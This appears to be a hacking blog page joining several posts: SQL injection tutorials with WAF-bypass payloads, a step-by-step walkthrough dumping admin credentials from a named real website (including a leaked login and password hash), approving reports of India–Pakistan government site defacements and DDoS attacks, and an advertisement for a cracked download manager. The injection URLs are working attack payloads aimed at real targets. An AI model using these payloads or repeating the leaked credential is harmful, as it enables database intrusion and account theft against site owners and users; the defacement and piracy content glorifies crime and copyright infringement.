sql injection waf bypassing

Hi all... i think u all know basic sql injection... But some time after you starting sql injection, you will get a FORBIDDEN page (403 error) normally you wil get this error after you finding the vulnerable page and the coloumn count and then when you start the union select statement...
This is because of the server side firewall or waf its used to filter some of your request. dont be sad.. we can bypass it. now am gonna show you one of the simple method to bypass waf.
befor starting just relax.. waf is just a workround..it can be bypassed

so.. lets begin...
i found a sql vulenereble site and found it vul
http://www.site.com/index.php?id=123’ //error
then find the coloumn count using ORDER BY statement
http://www.site.com/index.php?id=123 order by 10 --
the page wil shows some errors.. so the coloumn count is 9
ok... now we have to find the vulnerebile coloumn... for that we have to use UNION SELECT
http://www.site.com/index.php?id=123 union select 1,2,3,4,5,6,7,8,9--
aahhh suddenly we got some forbiddon error on our screen... usually after getting this error we leave that site
so now no need to leave that site we can hack it by altering the statement and bypass the waf/firewall
http://www.site.com/index.php?id=123/*!UNION*//*!SELECT*/1,2,3,4,5--
so what we did is add some special symbols for bypassing waf
"now am not going for the deep explanation of it, if anybody needs it,they can ask me at any time"
so what we did is just replace the UNION SELECT with /*UNION*//*!SELECT*/
bhoom.. now the page showing the some numbers.... so those are the vulnereble coloumns
so now we can extract some datas....
http://www.site.com/index.php?id=123 /*!UNION*//*!SELECT*/+1,CONCAT(database(),user(),version()),3,4,5-- (403 Forbidden – WTF?)
again forbidden
its cause the waf filter the CONCAT statement so we have to alter it
the code will looke like this [color=#FF0000]http://www.site.com/index.php?id=123 /*!UNION*/ /*!SELECT*/1,/*!CONCAT*/(database(),user(),version()),3,4,5--
so now the page give us the database,and user and the version
and the rset is same like the normal sqli..
use the /*!group_concat*/ statement for finding all the available DB and so on...

thre are some other methods too... i will explain that in my next post any doubts.. feel free to ask

Read More

SQL Injection Full Tutorial With Photo

SQL Injection Tutorial:

1. Finding vulnerable sites
2. Finding amount of columns
3. Getting mysql version
4. Getting Databases
5. Getting Tables
6. Getting Columns
7. Getting Usernames and Passwords 

1. Finding vulnerable sites

• inurl:index.php?id=
• inurl:news.php?id=
• inurl:gallery.php?id=
• inurl:category.php?id=
• inurl:games.php?id=
• inurl:forum.php?tid=
• inurl:newsletter.php?id=
• inurl:content.php?id=

You can find the largest collection of google dorks from here.


So as an example I find vulnerable site that is
http://www.geotunis.org/index_en.php?id=7


I know about vulnerability by using string ('). At the last of url use ' and if you got a error then it is vulnerable. In many sites don't show error but some text or image are missing. This kind of sites are also vulnerable

For sql injection we use a add-on which is very helpful to hacker.
Download it from https://addons.mozilla.org/en-US/firefox/addon/hackbar/

2. Finding Amount of Columns

To find the right number of column we are using "order by". After the url type 'order by 5' and see the page.

Here I do

www.geotunis.org/index_en.php?id=7 order by 5--

It seems that the page load normally and there are no error. That means columns are more than 5.

Again try

www.geotunis.org/index_en.php?id=7 order by 10--

It's showing error. That means columns number is less than 10.

By this try for finding columns number.

www.geotunis.org/index_en.php?id=7 order by 6-- [no error]

www.geotunis.org/index_en.php?id=7 order by 7-- [no error]

www.geotunis.org/index_en.php?id=7 order by 8-- [no error]

www.geotunis.org/index_en.php?id=7 order by 9-- [error]

So total column number is 8.

Now we find vulnerable column. To do this please folow me:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,4,5,6,7,8--

After id= please insert [-] and it means null.

We got the vulnerable column is 4.

3. Getting Mysql Version

Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,@@version,5,6,7,8--

In the vulnerable column we use @@version instead of column number.

<br><br>

ok we find it.

4. Getting Databases

Now we wanna find the databases and the Current database.
Here the syntax for all databases:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schema.schemata--

And it displays like this:

Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.

Syntax for current database:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,database(),5,6,7,8 from information_schema.schemata--

This should display something like this:

5. Getting Tables

Now we want to know the tables on in the database and for this we will conintue using "union select".

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--

It's output look like this:

Here admin table is 'utilisateurs'. In maximum sites tables are admin, users, administrator etc.

6. Getting Columns

Now we want to know the columns.
We will use following code:

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database()--

We got column and it looks like:

7. Dumping users/pass

Now you would like to dump logins and passwords.

www.geotunis.org/index_en.php?id=-7 union all select 1,2,3,group_concat(login,0x3a,pass,0x3a),5,6,7,8 from utilisateurs--

Now we got admin login and password

Here login: atign and pass: 720a7e98c63c155ae17b0e7d3ce10a09

The pass is md5hash. You can decrypt this hash from www.md5hacker.com

Thanks. If you are helpful by this tutorial please leave a comment and give us review in alexa.

----------------------------------------------------------------------------------------------------------------

Thanks for reading my tutorial. Comments would be appreciated.

Read More

600 sites Restored by Indian Mad Hunter

pakistani hacker groups , continue hacks Indian sites  and they give anti- Indian massage
on deface page but i the same time A rising Indian hacking Group Indian Mad Hunter restored all sites and change deface page ...and give strong massage to Pakistani hacker

Read More

Pakistan Minister of Interior website got hacked and defaced

Today 6th September is the Pakistan Defence Day and it seems that on this day some of the Pakistani hackers is celebrating with there hack. Mainly on these occasion hackers of the country hacked and deface site of other countries but here something different got to see.

The unknown Pakistani hacker have hacked and defaced the official site of Pakistan Minister of Interior site (www.interior.gov.pk). On the deface page hacker have wrote the following message-

Patwari's Hacked

  Happy Pakistan Defence Day

so called MR.BEAN owned ?

Mr.bean Your hair are as fake as Elections 2013

The deface page also contains the video, where users have made a comic of the Pakistan Politicians. 

With the above message on deface pages shows that hackers don't like the minister of Pakistan and also teasing him. 

Some what of same thing has also been done earlier also on the official Pakistan National web portal. On the Pakistan National Portal also hackers have made a troll photo of Pakistan minister and posted under the message section of the page. 

It seems that these hackers is not happy with the Pakistan government or ministers and thus showing protest by hacking government sites with their comic image.  

On the zone-h some one had made the mirror of the hack, with the name as ZombiE_KsA who is the popular hacker from Pakistan but is now inactive from quite a long time.

Read More

Press Information Department (Government of Pakistan) website hacked by Yamraaj

Two days before, Pakistani hackers have hacked some of the Indian Political party, Bhartiya Janta Party (BJP) websites. Sites of  BJP Punjab and Bihar unit’s website was defaced. Both the websites were defaced by different group of hackers, BJP's Bihar unit's website was defaced by a Pakistani hacker going with the online handle Muhammad Bilal whereas BJP's Punjab unit's website was defaced by KING_HAXOR & AryanZ Khan Tr4ck3r who are the members of PAKISTAN HAXORS CREW. Along with this BJP Junagadh unit’s website was defaced by Pakistani hacker.

On the all the hack hackers message on deface page showing about the (#Opkashmir). It seems that Pakistani hacker were protesting for the Kashmir (State of India).

On this regards, a know Indian hackers (Yamraaj) have also defaced the Pakistani government website. Press Information Department (Government of Pakistan (http://pid.gov.pk/site) have been hacked and defaced by Yamraaj. Additionally Many of the Indian hackers came up together and make the number of Pakistan government site offline via DDOS attack.

This not the first time that hackers from both the country are hacking each other domains. Earlier also they have hacked number of sites of each other. On the eve of Republic day or Independence day also they have hacked tonnes of each other websites.

Earlier also Yamraaj have hacked many Government website of Pakistan and Bangladesh.

Read More

Crack IDM Download

IDM 6.15 Build 8 Full Crack - Internet Download Manager 6.15 Final - Download IDM 615-Download IDM Free - Download Crack IDM
Internet Download Manager is a powerful file transfer manager that promises to accelerate downloads by up to 5 times. In addition, the application can also restart interrupted downloads and integrate into a large number of browsers, including Internet Explorer, Firefox, Google Chrome and Opera.

Internet Download Manager's interface is clean and well-organized, with large, stylish buttons that facilitate the management of the files in process. It is a great organizer too, as every single download can be moved into a different folder, depending on its type. Plus, it has a rich settings menu where you can change the way the program handles certain file formats or the default download locations.

We tried the quick update function too, which worked like a breeze and basically updated the application with just a single click. It all came down to choosing whether to update or not, and the whole job was done by the integrated updater that automatically downloaded the new files and installed them on the computer.

The application encases all the features specific to a decent download manager, including drag and drop support, a task scheduler, virus prot
ection, queue processor, HTTPS support, progressive downloading with quotas, command line parameters, sounds, ZIP preview and proxy servers.

The tests revealed that the CPU and memory footprint is minimal, but this also depends on the download speed and the overall size of the file.

Internet Download Manager is a must have application for many users out there. It will prove itself essential for users who download large files on a regular basis.

Internet Download Manager (IDM) is a tool to increase download speeds by up to 500 percent, resume and schedule downloads.

Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.

Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads.

During the download process Internet Download Manager segments downloaded files dynamically, unlike other download accelerators and managers that segment files before the download starts Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, directories with authorization, MP3 audio and MPEG video content processing, and a large number of directory listing formats.

IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL Explorer, Opera, Mozilla Firefox,Mozilla Firebird, Avant Browser, MyIE, Google Chrome, and all other popular browsers to automatically handle your downloads.

You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Other features include multilingual support, zip preview, download categories, built-in download accelerator, scheduler pro, sounds on events, HTTPS support, queue processor, pipelining of ftp commands, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), command line parameters, and many others.

Here are some key features of "Internet Download Manager":

· All popular browsers and applications are supported! Internet Download Manager supports all versions of popular browsers, and can be integrated into any 3rd party Internet applications.
· Download with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP and HTTPS protocols.
· Download Speed. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology.
· Download Resume. Internet Download Manager will resume unfinished download from the place where they left off.
· Simple installation wizard. Quick and easy installation program will make necessary settings for you, and check your connection at the end to ensure trouble free installation of Internet Download Manager
· Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
· Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of download managers have this feature.
· Built-in Scheduler. Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done.
· IDM supports many types of proxy servers. For example, IDM  orks with Microsoft ISA, and FTP proxy servers.
· IDM  upports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.
· Download All feature. IDM  an add all downloads linked to the current page. It's easy to download multiple files with this feature.
· Customizable Interface. You may choose the order, and what buttons and columns appear on the main IDM window.
· Download Categories. Internet Download Manager can be used to organize downloads automatically using defined download categories.
· Quick Update Feature. Quick update may check for new versions of IDM and update IDM once per week.
· Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
· Drag and Drop. You may simply drag and drop links to IDM, and drag and drop complete files out of Internet Download Manager.
· IDM is multilingual. IDM is translated to Arabic, Bosnian, Bulgarian, Chinese, Croatian, Czech, Danish, Dutch, French, German, Hungarian, Italian, Japanese, Lithuanian, Macedonian, Polish, Portuguese, Romanian, Russian, Slovenian, Spanish, Thai languages.

Click here for Download

Read More

jay hind

Read More